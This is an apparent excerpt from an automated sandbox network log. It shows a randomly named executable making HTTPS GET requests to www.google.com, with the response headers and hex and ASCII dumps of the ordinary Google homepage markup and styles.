                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73
                                                                                                                                                                                                                Data Ascii: 10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gs
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d
                                                                                                                                                                                                                Data Ascii: t-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30
                                                                                                                                                                                                                Data Ascii: l,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                15192.168.2.649726142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1200INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QTnOsumfQCWzwQe__WIe9g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-WYZZg6Z7REGv5cSzXYHusbYCiP6OKsu7khYCdbvdhKUk-tuRsLUWY; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=Fg9SbuehBT8G_I3V4PXgB9pbXb8CPDjgX_tFicyA7Bcn6P6omqhCFdvMow8PWiix5Ios8h343CfJ-ku-6QOEWQdMvarfXY3W4kf-ygY5o39iv0d3orKO_IVZetrshjxofGGfzT2YtJ3jrlFX7l_Pnmr71k8wX5XAME6U66PsAF0L1ungrO_Up7fLDJ9trblPuFsu7QVYdmpGEbUYV3s; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC190INData Raw: 34 38 35 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c
                                                                                                                                                                                                                Data Ascii: 485f<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Googl
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73
                                                                                                                                                                                                                Data Ascii: e has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_s
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 31 31 30 2c 35 31 34 2c 31 31 2c 31 34 38 2c 31 2c 33 2c 31 36 33 39 2c 35 37 36 2c 31 35 31 2c 32 37 35 2c 31 2c 38 36 2c 35 30 2c 36 33 31 2c 31 2c 39 2c 33 37 35 2c 32 2c 32 35 34 2c 33 35 39 2c 35 35 2c 32 2c 32 30 32 2c 32 2c 37 2c 34 33 34 2c 38 31 2c 31 34 32 2c 32 35 32 2c 32 30 30 2c 32 2c 37 2c 31 2c 31 34 30 2c 36 31 2c 31 38 33 2c 39 31 36 2c 35 31 30 2c 33 32 32 2c 32 35 38 2c 32 32 30 2c 38 34 2c 33 36 34 2c 36 39 39 2c 38 34 32 2c 31 31 31 2c 33 33 32 2c 31 39 34 2c 31 31 39 39 2c 33 30 30 2c 31 37 2c 33 2c 33 34 31 2c 34 36 30 2c 32 30 2c 37 30 37 2c 35 31 34 2c 32 2c 35 31 35 2c 39 31 32 2c 36 30 32 2c 37 33 2c 31 36 39 2c 33 2c 34 31 34 2c 36 38 38 2c 39 31 36 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 36 33 2c 37 32 37 2c 36 34 37 2c 32 2c 33
                                                                                                                                                                                                                Data Ascii: 110,514,11,148,1,3,1639,576,151,275,1,86,50,631,1,9,375,2,254,359,55,2,202,2,7,434,81,142,252,200,2,7,1,140,61,183,916,510,322,258,220,84,364,699,842,111,332,194,1199,300,17,3,341,460,20,707,514,2,515,912,602,73,169,3,414,688,916,1,5,4,4,4,163,727,647,2,3
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 67 6c 65 2e 67 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d
                                                                                                                                                                                                                Data Ascii: gle.getLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b
                                                                                                                                                                                                                Data Ascii: !1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{back
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6f 70 3a 2d 31 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35
                                                                                                                                                                                                                Data Ascii: op:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 23 33 36 63 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72
                                                                                                                                                                                                                Data Ascii: #36c;padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{bor
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d
                                                                                                                                                                                                                Data Ascii: block;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/im
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20
                                                                                                                                                                                                                Data Ascii: -weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6f 72 64 65 72 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e
                                                                                                                                                                                                                Data Ascii: order-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{fon


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                16192.168.2.649729142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1198INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-SWowg2FrEqZJ5bDrD4GCgA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-Wp_XU1UXoBNG6pa-gwyj3SBquaBJwB7vnpMsTtP_6xvVIt256d9w; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=Y1yjgRHiFa81shYjA7ntqjX-iTPB1YR10nXzRz3PFkBj-2tJX1bb8V1Z3IdAzShkkUVr8Fzg-Dkc6-s2VryESuWE559vWSaLzTeht5moat5L2bDHv2JjKUZ6SZCMeJj4uv1mX5QTOXADS7Q4lsEb1a1uBeNI4YRXmwdVRyXF958wtQfh3fPsB_XoHFjrk5-PZWq901mT9auen4bzOQ; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC192INData Raw: 34 64 33 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20
                                                                                                                                                                                                                Data Ascii: 4d3a<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61
                                                                                                                                                                                                                Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_sta
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 2c 33 31 30 2c 31 35 31 2c 33 36 31 2c 36 38 32 2c 31 2c 33 38 34 2c 32 2c 31 33 31 35 2c 38 31 2c 31 34 32 2c 36 30 33 2c 35 37 2c 35 2c 31 39 31 2c 36 33 31 2c 32 37 35 2c 35 38 2c 37 37 34 2c 31 37 37 2c 32 2c 37 38 2c 34 35 31 2c 32 32 38 2c 31 33 31 35 2c 34 34 32 2c 34 31 31 2c 31 31 39 37 2c 33 32 33 2c 31 37 2c 33 2c 33 32 30 2c 34 36 30 2c 33 32 37 2c 39 31 34 2c 32 2c 31 34 32 36 2c 36 37 37 2c 31 36 38 2c 33 2c 33 30 31 2c 31 31 33 2c 31 36 30 34 2c 31 2c 35 2c 34 2c 34 2c 34 2c 38 35 2c 37 38 2c 37 32 37 2c 36 34 37 2c 33 2c 32 31 39 2c 34 39 38 2c 33 30 30 2c 31 39 30 2c 37 2c 31 34 34 2c 31 33 2c 31 2c 31 2c 34 2c 37 38 2c 32 33 35 2c 37 38 2c 36 32 39 2c 32 2c 31 2c 32 2c 32 2c 32 2c 33 2c 34 31 2c 33 35 39 2c 31 37 32 2c 33 30 31 2c 36 37
                                                                                                                                                                                                                Data Ascii: ,310,151,361,682,1,384,2,1315,81,142,603,57,5,191,631,275,58,774,177,2,78,451,228,1315,442,411,1197,323,17,3,320,460,327,914,2,1426,677,168,3,301,113,1604,1,5,4,4,4,85,78,727,647,3,219,498,300,190,7,144,13,1,1,4,78,235,78,629,2,1,2,2,2,3,41,359,172,301,67
